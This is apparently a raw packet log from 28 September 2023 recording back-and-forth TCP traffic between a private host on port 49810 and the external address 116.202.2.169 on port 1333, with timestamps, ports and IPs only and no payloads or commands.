Sep 28, 2023 06:02:00.254465103 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.254501104 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.254507065 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.254537106 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.254542112 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.254576921 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.254581928 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.254612923 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.254618883 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.254648924 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.254653931 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.254684925 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.254688025 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.254720926 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.254726887 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.254759073 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.254764080 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.254795074 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.254801035 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.254829884 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.254836082 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.254865885 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.254870892 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.254900932 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.254906893 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.254940033 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.254944086 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.254977942 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.254981995 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255013943 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255018950 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255052090 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255053997 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255088091 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255099058 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255124092 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255129099 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255160093 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255167007 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255197048 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255202055 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255233049 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255238056 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255269051 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255275011 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255305052 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255312920 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255342007 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255343914 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255379915 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255383015 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255415916 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255417109 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255453110 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255459070 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255489111 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255495071 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255526066 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255531073 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255565882 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255572081 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255600929 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255606890 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255636930 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255641937 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255671978 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255677938 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255707979 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255712986 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255745888 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255749941 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255781889 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255789995 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255817890 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255824089 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255852938 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255857944 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255888939 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255899906 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255927086 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255937099 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.255964041 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.255974054 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.256000996 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.256011009 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.256036997 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.256050110 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.256072998 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.256083965 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.256109953 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.256119013 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.256148100 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.256184101 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.256216049 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.256216049 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.256218910 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.256231070 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.256256104 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.256275892 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.256290913 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.256314039 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.256383896 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.256398916 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.256422043 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.256439924 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.256458044 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.256485939 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.256493092 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.256506920 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.256541967 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.256603956 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.256640911 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.256649971 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.256680965 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.256688118 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.256716967 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.256730080 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.256753922 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.256766081 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.256789923 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.256814957 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.256825924 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.256844997 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.256866932 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.256882906 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.256902933 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.256913900 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.256939888 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.256949902 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.256975889 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.256987095 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257013083 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257021904 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257050991 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257062912 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257087946 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257097006 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257122993 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257134914 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257159948 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257169962 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257195950 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257205009 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257235050 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257246017 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257272005 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257282972 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257308006 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257318974 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257344007 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257354021 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257380962 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257390022 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257421017 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257430077 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257460117 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257472038 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257497072 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257508039 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257533073 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257543087 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257570982 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257580042 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257606030 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257618904 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257644892 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257654905 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257680893 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257699966 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257723093 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257731915 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257759094 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257771015 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257795095 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257808924 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257833958 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257844925 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257870913 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257882118 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257908106 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257917881 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257946014 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257957935 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.257982016 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.257993937 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.258021116 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.258033037 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.258059025 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.258071899 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.258095026 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.258106947 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.258131981 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.258143902 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.258167982 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.258179903 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.258205891 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.258215904 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.258241892 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.258254051 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.258279085 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.258290052 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.258315086 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.258327007 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.258352041 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.258363008 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.258388042 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.258404970 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.258425951 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.258439064 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.258476973 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.258481979 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.258522034 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.258533001 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.258558035 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.258570910 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.258594990 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.258605003 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.258636951 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.258651018 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.258675098 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.258687973 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.258712053 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.258723974 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.258749008 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.258759975 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.258785009 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.258797884 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.258821011 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.258832932 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.258857012 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.258869886 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.258893967 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.258905888 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.258930922 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.258941889 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.258966923 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.258979082 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259004116 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259008884 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259041071 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259053946 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259092093 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259104013 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259130001 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259140015 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259166956 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259177923 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259202957 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259216070 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259239912 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259249926 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259277105 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259290934 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259314060 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259325027 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259350061 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259361982 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259387016 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259397984 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259427071 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259434938 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259465933 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259476900 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259504080 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259514093 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259541035 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259553909 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259577990 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259589911 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259613991 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259625912 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259653091 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259665012 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259690046 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259699106 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259727001 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259738922 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259762049 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259783030 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259799957 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259812117 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259839058 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259850979 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259877920 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259888887 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259916067 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259927034 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259952068 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259964943 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.259989023 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.259999037 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260025978 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.260041952 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260066032 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.260077953 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260102034 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.260108948 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260137081 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.260144949 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260171890 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.260179043 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260209084 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.260215044 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260246992 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.260252953 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260282993 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.260288954 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260318041 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.260324955 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260354042 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.260360003 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260389090 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.260395050 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260432959 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.260433912 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260469913 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.260476112 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260505915 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.260513067 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260541916 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.260546923 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260579109 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.260584116 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260616064 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.260621071 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260652065 CEST	1333	49810	116.202.2.169	192.168.2.3
